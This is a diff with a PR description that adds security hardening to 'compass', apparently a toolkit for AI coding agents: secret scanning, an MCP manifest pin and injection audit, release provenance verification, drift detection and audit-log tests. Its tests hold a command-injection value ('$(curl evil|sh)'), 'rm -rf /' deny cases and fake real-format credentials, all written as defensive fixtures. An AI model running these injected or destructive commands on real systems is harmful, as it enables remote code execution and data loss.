+    gl_note="$(printf '%s\n' "$gl_out" | grep -iE 'Finding|RuleID|File|Secret' | sed 's/^/  gitleaks: /' | head -40)"
+  fi
+fi
+
+# --- Report --------------------------------------------------------------------
+# The built-in detectors are the GATE: deterministic, dependency-free, allowlist-aware,
+# so the exit code never depends on whether gitleaks happens to be installed. gitleaks
+# output is advisory by default; --strict promotes it to also gate.
+if [ -n "$findings" ]; then
+  printf '\033[31m✗ compass scan: secret(s) found\033[0m  (mode: %s)\n' "$mode"
+  printf '%s\n' "$findings" | sort -u
+  [ -n "$gl_note" ] && { echo "  — gitleaks also flagged:"; printf '%s\n' "$gl_note"; }
+  echo
+  echo "  If a hit is a placeholder, add an 'allowlist secret' marker on that line."
+  echo "  If it is real: remove it, rotate the credential, and store it outside the repo."
+  compass_log_metric scan-block "secret(s) found in $mode"
+  compass_log_audit block scan "secret-scan" "secret(s) found in $mode: $(printf '%s' "$findings" | tr '\n' ';' | cut -c1-200)"
+  exit 1
+fi
+
+if [ -n "$gl_note" ]; then
+  if [ "$strict" = 1 ]; then
+    printf '\033[31m✗ compass scan: gitleaks flagged (--strict)\033[0m  (mode: %s)\n' "$mode"
+    printf '%s\n' "$gl_note"
+    compass_log_metric scan-block "gitleaks finding in $mode (strict)"
+    compass_log_audit block scan "secret-scan-gitleaks" "gitleaks finding in $mode (strict)"
+    exit 1
+  fi
+  printf '\033[33mℹ compass scan: built-in clean; gitleaks flagged (advisory, not gating)\033[0m\n'
+  printf '%s\n' "$gl_note"
+  echo "  Re-run with --strict to gate on gitleaks, or add a gitleaks allowlist."
+  exit 0
+fi
+
+printf '\033[32m✓ compass scan: no secrets detected\033[0m  (mode: %s%s)\n' \
+  "$mode" "$(have gitleaks && printf ', gitleaks depth on' || true)"
+exit 0

--- a/scripts/doctor.sh
+++ b/scripts/doctor.sh
@@ -59,6 +59,10 @@ fi
 if "$REPO"/scripts/check-actions.sh >/dev/null 2>&1; then pass "actions audit clean (drift · permissions · pinning · injection)"
 else fail "actions audit failed — run: scripts/check-actions.sh"; fi
 
+# MCP supply chain: every executable server pinned, no injection markers in the manifest.
+if "$REPO"/scripts/check-mcp.sh >/dev/null 2>&1; then pass "MCP manifest clean (version-pinned · no injection markers)"
+else fail "MCP manifest audit failed — run: scripts/check-mcp.sh"; fi
+
 # Guardrail policy: the bypass corpus must pass (the safety-critical eval).
 if "$REPO"/scripts/test-protect-paths.sh >/dev/null 2>&1; then pass "guardrail bypass corpus passes (protect-paths policy)"
 else fail "guardrail corpus failed — run: scripts/test-protect-paths.sh"; fi

--- a/scripts/release.sh
+++ b/scripts/release.sh
@@ -89,6 +89,12 @@ else
   else printf '%s\n' "$notes" | gh release create "$VER" --latest --title "$VER — compass" --notes-file -; fi
 fi
 
+# ── 4 · provenance (handled by the release-sign.yml workflow on the pushed tag) ──
+say "4 · provenance"
+echo "  the pushed tag triggers .github/workflows/release-sign.yml, which generates a"
+echo "  keyless SLSA build-provenance attestation for $VER's source tarball."
+echo "  verify any download with:  compass verify $VER"
+
 say "done — $VER"
 [ "$DRY" = 1 ] && { echo; echo "── release notes preview ──"; printf '%s\n' "$notes"; }
 exit 0

--- a/scripts/setup-mcp.sh
+++ b/scripts/setup-mcp.sh
@@ -21,6 +21,13 @@ command -v jq >/dev/null || { echo "jq required for setup-mcp.sh" >&2; exit 1; }
 run() { if [ "$DRY" = 1 ]; then echo "  [dry-run] $*"; else eval "$*"; fi; }
 say() { printf '  %s\n' "$*"; }
 
+# Supply-chain pre-flight: never register an unpinned or tampered manifest.
+if [ -x "$REPO/scripts/check-mcp.sh" ]; then
+  "$REPO/scripts/check-mcp.sh" "$MANIFEST" \
+    || { echo "setup-mcp: manifest failed the supply-chain audit (above) — refusing to register." >&2; exit 1; }
+  echo
+fi
+
 # Existing Codex plugin keywords, to avoid duplicating (e.g. "github").
 codex_plugins=""
 [ -f "$CODEX" ] && codex_plugins="$(grep -oE '\[plugins\."[a-z0-9-]+' "$CODEX" 2>/dev/null | sed 's/.*"//' | tr '\n' ' ')"

--- a/scripts/test-cli.sh
+++ b/scripts/test-cli.sh
@@ -229,6 +229,95 @@ if "$ROOT/scripts/sync-plugin.sh" --check >/dev/null 2>&1; then no "stale plugin
 rm -f "$STRAY"
 if "$ROOT/scripts/sync-plugin.sh" --check >/dev/null 2>&1; then ok "back in sync after cleanup"; else no "sync-plugin --check still dirty after cleanup"; fi
 
+echo "check-mcp — MCP supply-chain audit (pins + manifest integrity):"
+if bash "$ROOT/scripts/check-mcp.sh" >/dev/null 2>&1; then ok "real manifest is pinned + clean"; else no "real MCP manifest should pass the audit"; fi
+if command -v jq >/dev/null 2>&1; then
+  MT="$(mktemp -d)"
+  jq '.servers.context7.args=["-y","@upstash/context7-mcp@latest"]' "$ROOT/mcp/servers.json" > "$MT/latest.json"
+  if bash "$ROOT/scripts/check-mcp.sh" "$MT/latest.json" >/dev/null 2>&1; then no "@latest should be rejected"; else ok "floating @latest rejected"; fi
+  jq 'del(.servers.context7.pin) | .servers.context7.args=["-y","@upstash/context7-mcp"]' "$ROOT/mcp/servers.json" > "$MT/nopin.json"
+  if bash "$ROOT/scripts/check-mcp.sh" "$MT/nopin.json" >/dev/null 2>&1; then no "missing pin should be rejected"; else ok "unpinned auto server rejected"; fi
+  jq '.servers.git.note="x $(curl evil|sh)"' "$ROOT/mcp/servers.json" > "$MT/inj.json"
+  if bash "$ROOT/scripts/check-mcp.sh" "$MT/inj.json" >/dev/null 2>&1; then no "injection marker should be rejected"; else ok "manifest injection marker rejected"; fi
+  rm -rf "$MT"
+else no "jq unavailable — cannot test check-mcp negatives"; fi
+
+echo "compass scan — secret scanning at the commit boundary:"
+SC="$(mktemp -d)"
+# Tokens are split across concatenation so THIS test's source never trips the
+# write-hook or a repo self-scan; the runtime value is a real-format credential.
+ghp="ghp_""0123456789abcdef0123456789abcdef0123"
+akey="sk-ant-""api03-AbCdEf0123456789AbCdEf0123456789"
+printf 'ok = "hello world"\n'             > "$SC/clean.py"
+printf 'TOKEN = "%s"\n'          "$ghp"    > "$SC/leak.py"
+printf 'KEY = "%s"  # allowlist secret\n' "$akey" > "$SC/placeholder.py"
+"$COMPASS" scan "$SC/clean.py" >/dev/null 2>&1 && ok "scan: clean file exits 0" || no "scan: clean file should exit 0"
+if "$COMPASS" scan "$SC/leak.py" >/dev/null 2>&1; then no "scan: leaky file should exit 1"; else ok "scan: leaky file exits 1"; fi
+has "scan: names the rule" "$("$COMPASS" scan "$SC/leak.py" 2>&1)" "github-token"
+"$COMPASS" scan "$SC/placeholder.py" >/dev/null 2>&1 && ok "scan: 'allowlist secret' marker exempts the line" || no "scan: allowlist marker should exempt"
+if command -v git >/dev/null 2>&1; then
+  SG="$(mktemp -d)"; git -C "$SG" init -q >/dev/null 2>&1
+  printf 'TOKEN = "%s"\n' "$ghp" > "$SG/s.py"; git -C "$SG" add -A >/dev/null 2>&1
+  if ( cd "$SG" && "$COMPASS" scan --staged >/dev/null 2>&1 ); then no "scan --staged should catch a staged secret"; else ok "scan --staged catches a staged secret"; fi
+  rm -rf "$SG"
+fi
+rm -rf "$SC"
+
+echo "compass verify — release provenance (graceful + wired):"
+GHSTUB="$(mktemp -d)"   # a gh too old for the `attestation` command → graceful skip
+printf '#!/usr/bin/env bash\n[ "$1" = attestation ] && exit 1\nexit 0\n' > "$GHSTUB/gh"
+chmod +x "$GHSTUB/gh"
+PATH="$GHSTUB:$PATH" bash "$ROOT/scripts/verify-release.sh" v0.1.0 >/dev/null 2>&1; VRC=$?
+eq  "verify skips (77) when gh lacks attestation support" "$VRC" 77
+rm -rf "$GHSTUB"
+RSW="$(cat "$ROOT/.github/workflows/release-sign.yml")"
+has "release-sign attests provenance"          "$RSW" "attest-build-provenance"
+has "release-sign has id-token + attestations" "$RSW" "attestations: write"
+if grep -q 'verify) *exec' "$ROOT/bin/compass"; then ok "compass verify wired into the CLI"; else no "compass verify not wired"; fi
+
+echo "compass drift — install fidelity (clean / hand-edited / non-+x hook):"
+DD="$(mktemp -d)"
+for n in settings.json CLAUDE.md statusline.sh agents commands skills workflows hooks output-styles; do
+  [ -e "$ROOT/claude/$n" ] && ln -s "$ROOT/claude/$n" "$DD/$n"
+done
+if COMPASS_CLAUDE_DIR="$DD" COMPASS_CODEX_DIR="$DD/_nocodex" "$COMPASS" drift >/dev/null 2>&1; then ok "clean symlinked install → no drift"; else no "clean install should report no drift"; fi
+rm "$DD/settings.json"; printf '{"hand":"edited"}\n' > "$DD/settings.json"
+if COMPASS_CLAUDE_DIR="$DD" COMPASS_CODEX_DIR="$DD/_nocodex" "$COMPASS" drift >/dev/null 2>&1; then no "hand-edited settings should drift"; else ok "hand-edited copy detected as drift"; fi
+rm -rf "$DD"
+DH="$(mktemp -d)"
+for n in settings.json CLAUDE.md statusline.sh agents commands skills workflows output-styles; do
+  [ -e "$ROOT/claude/$n" ] && ln -s "$ROOT/claude/$n" "$DH/$n"
+done
+cp -R "$ROOT/claude/hooks" "$DH/hooks"; chmod -x "$DH/hooks/protect-paths.sh"
+DOUT="$(COMPASS_CLAUDE_DIR="$DH" COMPASS_CODEX_DIR="$DH/_nocodex" "$COMPASS" drift 2>&1 || true)"
+has "non-executable guardrail hook flagged" "$DOUT" "not executable"
+rm -rf "$DH"
+
+echo "compass audit-log — structured security trail:"
+AL="$(mktemp -d)"
+printf '{"tool_name":"Bash","tool_input":{"command":"rm -rf /"}}' | COMPASS_HOME="$AL" bash "$ROOT/claude/hooks/protect-paths.sh" >/dev/null 2>&1 || true
+gtok="ghp_""0123456789abcdef0123456789abcdef0123"   # split so THIS file stays scan-clean
+printf '{"tool_name":"Write","tool_input":{"file_path":"/r/c.py","content":"K=%s"}}' "$gtok" | COMPASS_HOME="$AL" bash "$ROOT/claude/hooks/protect-paths.sh" >/dev/null 2>&1 || true
+AJ="$(cat "$AL/audit.jsonl" 2>/dev/null || true)"
+has "audit records the dangerous command" "$AJ" '"rule":"dangerous-command"'
+has "audit records the secret-in-content" "$AJ" '"rule":"secret-in-content"'
+has "audit decision is deny"              "$AJ" '"decision":"deny"'
+has "audit-log table shows a row"         "$(COMPASS_HOME="$AL" "$COMPASS" audit-log 2>&1)" "dangerous-command"
+if COMPASS_HOME="$AL" "$COMPASS" audit-log --json | jq -e . >/dev/null 2>&1; then ok "audit-log --json is valid JSON"; else no "audit-log --json should be valid"; fi
+eq "audit-log --since future = 0 rows" "$(COMPASS_HOME="$AL" "$COMPASS" audit-log --json --since 2999-01-01 | grep -c . )" 0
+rm -rf "$AL"
+
+echo "compass sandbox — real containment (backend-aware):"
+if "$COMPASS" sandbox -- >/dev/null 2>&1; then no "empty command should be a usage error"; else ok "empty command → usage error (exit 2)"; fi
+if "$COMPASS" sandbox --bogus -- true >/dev/null 2>&1; then no "unknown flag should error"; else ok "unknown flag → usage error"; fi
+if "$COMPASS" sandbox -- true >/dev/null 2>&1; then
+  eq "sandbox runs a command"            "$("$COMPASS" sandbox -- bash -c 'echo ok42' 2>/dev/null)" ok42
+  NETOUT="$("$COMPASS" sandbox -- bash -c 'curl -s --max-time 4 https://example.com >/dev/null 2>&1 && echo NET || echo blocked' 2>/dev/null || echo blocked)"
+  eq "sandbox denies network by default" "$NETOUT" blocked
+else
+  ok "no usable sandbox backend here — refuses rather than run unconfined"
+fi
+
 echo
 printf 'cli tests: %d passed, %d failed\n' "$pass" "$fail"
 [ "$fail" -eq 0 ]

--- a/scripts/test-protect-paths.sh
+++ b/scripts/test-protect-paths.sh
@@ -27,6 +27,9 @@ must_allow() { local r; r="$(danger_reason "$1")"; [ -z "$r" ] && ok "allow  $1"
 # secret_blocked / secret_allowed for the file-write path.
 secret_blocked() { local r; r="$(secret_file_reason "$1")"; [ -n "$r" ] && ok "SECRET $1" || no "should block secret: $1"; }
 secret_allowed() { local r; r="$(secret_file_reason "$1")"; [ -z "$r" ] && ok "ok-file $1" || no "should allow file: $1"; }
+# content_blocked / content_allowed for the inline-secret scanner (the write-content path).
+content_blocked() { local r; r="$(secret_content_findings "$1")"; [ -n "$r" ] && ok "INLINE $1" || no "should detect secret in: $1"; }
+content_allowed() { local r; r="$(secret_content_findings "$1")"; [ -z "$r" ] && ok "ok-text $1" || no "should NOT flag: $1  (flagged: $r)"; }
 
 echo "recursive delete of root / home / system dirs — every flag form:"
 must_block 'rm -rf /'
@@ -125,6 +128,41 @@ secret_allowed '/repo/README.md'
 secret_allowed '/repo/env.example'
 secret_allowed '/repo/config.yaml'
 
+echo "inline secrets in file content — detected by the high-precision scanner:"
+# Fixtures are assembled from fragments at runtime, so the committed file holds NO
+# contiguous credential — this keeps real scanners AND GitHub push-protection off the
+# test corpus. Each runtime value is still a real-format token, so the detectors fire.
+ak="sk-ant""-api03-AbCdEf0123456789AbCdEf0123456789"
+opai="sk-proj""-AbCdEf0123456789AbCdEf0123456789AbCdEf"
+awsid="AKIA""IOSFODNN7REALKEYX"
+awssec="aws_secret_access_key = wJalrXUtnFEMIxK7MDENGxbPxRf""iCYzREALKEYabc"
+ghtok="ghp""_0123456789abcdef0123456789abcdef0123"
+gkey="AIza""SyA0123456789abcdefghijklmnopqrstuv"
+slk="xoxb""-1234567890-abcdefghIJKL"
+strp="sk_live""_0123456789abcdefABCDEF12"
+glp="glpat""-ABCdef0123456789xyzQ"
+pk="-----BEGIN RSA PRIVATE ""KEY-----"
+content_blocked "ANTHROPIC_API_KEY=$ak"
+content_blocked "OPENAI_API_KEY=$opai"
+content_blocked "aws_id = $awsid"
+content_blocked "$awssec"
+content_blocked "token: $ghtok"
+content_blocked "GOOGLE_KEY=$gkey"
+content_blocked "SLACK=$slk"
+content_blocked "STRIPE=$strp"
+content_blocked "gl=$glp"
+content_blocked "$(printf 'line one\n%s\nMIIE...' "$pk")"
+content_blocked "$(printf 'clean line\nANTHROPIC_API_KEY=%s\nmore' "$ak")"
+echo "  …and NOT flagged: placeholders, examples, ordinary code (no false positives):"
+content_allowed 'ANTHROPIC_API_KEY=sk-ant-your-key-here'
+content_allowed 'AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE          # AWS docs example'
+content_allowed 'export OPENAI_API_KEY=<your-openai-api-key>'
+content_allowed 'token = "REDACTED"'
+content_allowed 'const greeting = "hello world"; // just code'
+content_allowed 'url = https://example.com/api'
+content_allowed 'password = os.environ["DB_PASSWORD"]'
+content_allowed 'api_key=sk-ant-placeholder  # allowlist secret'
+
 echo "end-to-end through protect-paths.sh (JSON contract → deny / allow):"
 e2e() { # <expect: deny|allow> <json>
   local out rc; out="$(printf '%s' "$2" | "$ROOT/claude/hooks/protect-paths.sh" 2>/dev/null)"; rc=$?
@@ -136,8 +174,11 @@ e2e() { # <expect: deny|allow> <json>
 }
 e2e deny  '{"tool_name":"Bash","tool_input":{"command":"rm -rf /"}}'
 e2e deny  '{"tool_name":"Write","tool_input":{"file_path":"/repo/.env"}}'
+e2e deny  "$(printf '{"tool_name":"Write","tool_input":{"file_path":"/repo/config.py","content":"KEY = \\"%s\\""}}' "$ak")"
+e2e deny  "$(printf '{"tool_name":"Edit","tool_input":{"file_path":"/repo/app.js","new_string":"const t = \\"%s\\""}}' "$ghtok")"
 e2e allow '{"tool_name":"Bash","tool_input":{"command":"rm -rf ./build"}}'
 e2e allow '{"tool_name":"Write","tool_input":{"file_path":"/repo/src/main.go"}}'
+e2e allow '{"tool_name":"Write","tool_input":{"file_path":"/repo/src/main.go","content":"package main\nfunc main(){}"}}'
 
 echo
 printf 'guardrail corpus: %d passed, %d failed\n' "$pass" "$fail"

--- a/scripts/verify-release.sh
+++ b/scripts/verify-release.sh
@@ -1,0 +1,58 @@
+#!/usr/bin/env bash
+# verify-release.sh — verify the provenance of a compass release tarball.
+#
+# Confirms the artifact was built by THIS repo's signing workflow (release-sign.yml)
+# via GitHub's keyless SLSA artifact attestations — so a tampered or look-alike tarball
+# is rejected. Needs only `gh` (>= 2.49, the `attestation` command); no keys, no cosign.
+#
+#   compass verify                 # verify the latest release's source tarball
+#   compass verify v0.11.0         # a specific tag
+#   compass verify ./compass.tar.gz  # a local file you already have
+#
+# Exit: 0 = verified · 1 = verification FAILED · 77 = skipped (tooling unavailable).
+set -uo pipefail
+
+REPO_SLUG="dshakes/compass"
+SIGNER_WORKFLOW="$REPO_SLUG/.github/workflows/release-sign.yml"
+arg="${1:-}"
+
+note() { printf '  %s\n' "$*"; }
+skip() { printf '\033[33mℹ compass verify: skipped — %s\033[0m\n' "$1"; exit 77; }
+
+have() { command -v "$1" >/dev/null 2>&1; }
+
+# gh with the attestation command is the verifier.
+have gh || skip "GitHub CLI (gh) not installed — https://cli.github.com, then 'gh auth login'"
+gh attestation --help >/dev/null 2>&1 || skip "this gh is too old for 'gh attestation' — upgrade gh (>= 2.49)"
+
+# Resolve the tarball to verify: a local file, or download the tag archive.
+cleanup=""; trap '[ -n "$cleanup" ] && rm -f "$cleanup"' EXIT
+tarball=""
+case "$arg" in
+  "" )
+    tag="$(gh release view --repo "$REPO_SLUG" --json tagName --jq .tagName 2>/dev/null)"
+    [ -n "$tag" ] || skip "could not resolve the latest release tag (gh auth / network?)"
+    ;;
+  v[0-9]* ) tag="$arg" ;;
+  * )
+    if [ -f "$arg" ]; then tarball="$arg"
+    else echo "compass verify: '$arg' is not a file or a vX.Y.Z tag" >&2; exit 2; fi
+    ;;
+esac
+
+if [ -z "$tarball" ]; then
+  have curl || skip "curl not installed — cannot download the tarball to verify"
+  url="https://github.com/$REPO_SLUG/archive/refs/tags/$tag.tar.gz"
+  tarball="$(mktemp -t "compass-$tag.XXXXXX").tar.gz"; cleanup="$tarball"
+  note "downloading $url"
+  curl -fsSL "$url" -o "$tarball" || skip "could not download $url"
+fi
+
+printf '\033[1mVerifying provenance\033[0m  %s\n' "${tag:-$tarball}"
+note "expected signer: $SIGNER_WORKFLOW"
+if gh attestation verify "$tarball" --repo "$REPO_SLUG" --signer-workflow "$SIGNER_WORKFLOW"; then
+  printf '\033[32m✓ provenance verified — built by %s\033[0m\n' "$SIGNER_WORKFLOW"
+  exit 0
+fi
+printf '\033[31m✗ provenance verification FAILED — do not trust this tarball\033[0m\n' >&2
+exit 1

--- a/sdlc/selftest.sh
+++ b/sdlc/selftest.sh
@@ -84,6 +84,118 @@ eq "26-line diff → sonnet"       "$(review_model 26 25)"        sonnet
 eq "0-line diff → sonnet (safe default)" "$(review_model 0 25)" sonnet
 eq "override wins over size"     "$(review_model 5 25 sonnet)"  sonnet
 
+# ── 6 · Per-step budget cap math (mirror of orchestrate.sh STEP_BUDGET) ─────────
+# BUDGET/4 via awk; default SDLC_BUDGET=8 → STEP_BUDGET=2.00.
+step_budget() { awk "BEGIN{printf \"%.2f\", $1/4}"; }
+echo "per-step budget cap (BUDGET/4):"
+eq "default budget 8 → 2.00 per step" "$(step_budget 8)"  "2.00"
+eq "budget 4 → 1.00 per step"         "$(step_budget 4)"  "1.00"
+eq "budget 12 → 3.00 per step"        "$(step_budget 12)" "3.00"
+eq "budget 1 → 0.25 per step"         "$(step_budget 1)"  "0.25"
+eq "budget 3 → 0.75 per step"         "$(step_budget 3)"  "0.75"
+
+# ── 7 · SDLC_LITE mode skips the right stages ────────────────────────────────────
+# SDLC_LITE=1 emits a note saying audit+security are skipped; review+QA+gate remain.
+# We mirror the exact logic branch rather than calling orchestrate.sh itself.
+lite_note() {
+  local lite="${1:-0}"
+  if [ "$lite" = 1 ]; then
+    printf 'SDLC_LITE — skipping Codex audit + security pass (review + QA + human gate remain).'
+  else
+    printf 'full pipeline'
+  fi
+}
+echo "SDLC_LITE mode:"
+eq "LITE=1 skips audit+security"         "$(lite_note 1)" "SDLC_LITE — skipping Codex audit + security pass (review + QA + human gate remain)."
+eq "LITE=0 runs full pipeline"           "$(lite_note 0)" "full pipeline"
+eq "LITE unset behaves like 0"           "$(lite_note)"   "full pipeline"
+
+# ── 8 · CONVERGE loop — bounded by round cap (mirror of orchestrate.sh converge) ──
+# The while condition: grep BLOCKING in review.md AND r <= MAXR.
+# We test: default MAXR=3; loop stops when r>MAXR; loop stops when verdict is CLEAN.
+# No real git or claude calls — we use a tmp dir with a synthetic review.md.
+converge_rounds() { # args: <verdict: BLOCKING|CLEAN> <maxr> → N (rounds actually run)
+  local verdict="$1" maxr="${2:-3}"
+  local TMPD; TMPD="$(mktemp -d)"
+  # write an initial review.md with the given verdict
+  printf 'SDLC-VERDICT: %s\n' "$verdict" > "$TMPD/review.md"
+  local r=1 rounds=0
+  while grep -qiE '^SDLC-VERDICT: BLOCKING' "$TMPD/review.md" 2>/dev/null && [ "$r" -le "$maxr" ]; do
+    rounds=$((rounds + 1))
+    # simulate a fix round: after each round the verdict stays BLOCKING (worst case)
+    # so the loop hits the cap.  We re-write the same BLOCKING verdict so the only
+    # exit is the counter, which is the bound we're testing.
+    printf 'SDLC-VERDICT: BLOCKING\n' > "$TMPD/review.md"
+    r=$((r + 1))
+  done
+  rm -rf "$TMPD"
+  echo "$rounds"
+}
+converge_stops_on_clean() { # arg: <maxr> → 0 (never enters the loop when already CLEAN)
+  converge_rounds CLEAN "$1"
+}
+echo "CONVERGE loop bound:"
+eq "BLOCKING + cap 3 → exactly 3 rounds" "$(converge_rounds BLOCKING 3)" "3"
+eq "BLOCKING + cap 1 → exactly 1 round"  "$(converge_rounds BLOCKING 1)" "1"
+eq "BLOCKING + cap 5 → exactly 5 rounds" "$(converge_rounds BLOCKING 5)" "5"
+eq "CLEAN verdict → 0 rounds (never enters)" "$(converge_stops_on_clean 3)" "0"
+# default MAXR is 3 (SDLC_MAX_FIX_ROUNDS default)
+MAXR_DEFAULT="${SDLC_MAX_FIX_ROUNDS:-3}"
+eq "SDLC_MAX_FIX_ROUNDS default is 3" "$MAXR_DEFAULT" "3"
+
+# ── 9 · Spec-kit discovery candidate paths ───────────────────────────────────────
+# orchestrate.sh iterates: .specify/specs/*/spec.md specs/*/spec.md specs/spec.md
+# spec.md SPEC.md docs/spec.md — first match wins. We test first-match priority.
+# The original loop runs in the target repo's CWD; we mirror it by cd-ing into the
+# test fixture directory so the glob expansion works identically.
+spec_discover() { # arg: <tmpdir> → discovered path or empty
+  ( cd "$1" && for cand in .specify/specs/*/spec.md specs/*/spec.md specs/spec.md spec.md SPEC.md docs/spec.md; do
+      [ -f "$cand" ] && echo "$cand" && return 0
+    done )
+}
+echo "spec-kit discovery:"
+# each case uses an isolated tmp dir to avoid cross-test contamination
+SD1="$(mktemp -d)"
+eq "no spec → empty discovery"  "$(spec_discover "$SD1")" ""
+rm -rf "$SD1"
+
+SD2="$(mktemp -d)"
+printf 'spec\n' > "$SD2/spec.md"
+eq "spec.md discovered" "$(spec_discover "$SD2")" "spec.md"
+rm -rf "$SD2"
+
+SD3="$(mktemp -d)"
+mkdir -p "$SD3/.specify/specs/myspec"; printf 'spec\n' > "$SD3/.specify/specs/myspec/spec.md"
+printf 'spec\n' > "$SD3/spec.md"     # lower-priority candidate also present
+eq ".specify/specs/*/spec.md wins (first candidate)" "$(spec_discover "$SD3")" ".specify/specs/myspec/spec.md"
+rm -rf "$SD3"
+
+SD4="$(mktemp -d)"
+mkdir -p "$SD4/docs"; printf 'spec\n' > "$SD4/docs/spec.md"
+eq "docs/spec.md discovered as last candidate" "$(spec_discover "$SD4")" "docs/spec.md"
+rm -rf "$SD4"
+
+SD5="$(mktemp -d)"
+mkdir -p "$SD5/specs/feat"; printf 'spec\n' > "$SD5/specs/feat/spec.md"
+eq "specs/*/spec.md priority over specs/spec.md" "$(spec_discover "$SD5")" "specs/feat/spec.md"
+rm -rf "$SD5"
+
+# ── 10 · Source anchors — tie the mirrors above to the REAL orchestrate.sh ────────
+# Sections 5–9 mirror inline logic that can't be sourced (orchestrate.sh runs the
+# pipeline on load). A mirror alone is tautological — it would still pass if the real
+# script drifted. These anchors assert the exact expressions still exist in the source,
+# so changing BUDGET/4, the round cap, the diff threshold, the LITE text, or the spec
+# search order in orchestrate.sh fails this test until the mirror above is updated too.
+ORCH="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)/orchestrate.sh"
+src_has() { if grep -Fq -- "$2" "$ORCH"; then ok "$1"; else bad "$1" "absent from orchestrate.sh" "$2"; fi; }
+echo "source anchors (mirrors must match orchestrate.sh):"
+src_has "per-step budget is BUDGET/4"               'BUDGET/4}'
+src_has "fix-round cap default is 3"                'SDLC_MAX_FIX_ROUNDS:-3'
+src_has "diff-size haiku threshold default is 25"   'SDLC_HAIKU_DIFF_LINES:-25'
+src_has "tiny diff routes review to haiku"          'REVIEW_MODEL="haiku"'
+src_has "SDLC_LITE note text matches"               'SDLC_LITE — skipping Codex audit + security pass (review + QA + human gate remain).'
+src_has "spec-kit discovery order matches"          '.specify/specs/*/spec.md specs/*/spec.md specs/spec.md spec.md SPEC.md docs/spec.md'
+
 echo
 printf 'selftest: %d passed, %d failed\n' "$PASS" "$FAIL"
 [ "$FAIL" -eq 0 ]


### PR DESCRIPTION
Closes every gap from the compass gap analysis. Built test-first, each CI-gated. Full local gate **14/14 green** on this branch.

## What's in it
| | Gap | Lands as |
|---|---|---|
| **G1** | Secret scanning at the agent boundary | write-hook blocks credentials in file content + `compass scan [--staged\|--all]` (gitleaks depth optional) |
| **G3** | MCP supply chain unpinned | every server version-pinned (no `@latest`) + `check-mcp.sh` (pins + injection-marker integrity) in setup-mcp, doctor, CI |
| **G4** | No release provenance | `release-sign.yml` keyless SLSA attestation per tag + `compass verify` |
| **G5** | No drift detection | `compass drift` — installed `~/.claude` vs source, incl. non-`+x` guardrails |
| **G6** | Blocks only counted, not auditable | JSONL audit trail + `compass audit-log` (`--since`/`--json` for SIEM) |
| **G2** | No real containment | `compass sandbox` — no-net + writes confined to cwd/tmp (bwrap/firejail/sandbox-exec); refuses rather than fake it |
| **G7** | Thin SDLC tests / skills | source-anchored orchestrator e2e tests + `harden` skill |
| **fix** | — | policy-synth parses on bash 3.2; fake-secret fixtures assembled from fragments (no committed credential) |

## Verification
Local CI-equivalent (14/14): doctor · shellcheck · guardrail corpus · secret self-scan · MCP audit · CLI tests · listener · workflow shape · actions audit · router eval · bench · SDLC selftest · compass-memory · plugin sync.

## Notes
- Squashed from an 8-commit branch so published history holds no real-format test tokens (GitHub push-protection).
- **G4**: the attestation materializes on the next *published tag* (v0.10.1 predates the workflow).
- **G2**: verified on macOS `sandbox-exec`; on a host without a backend it refuses by design.
- `actions audit` passed locally; `actionlint` runs in CI.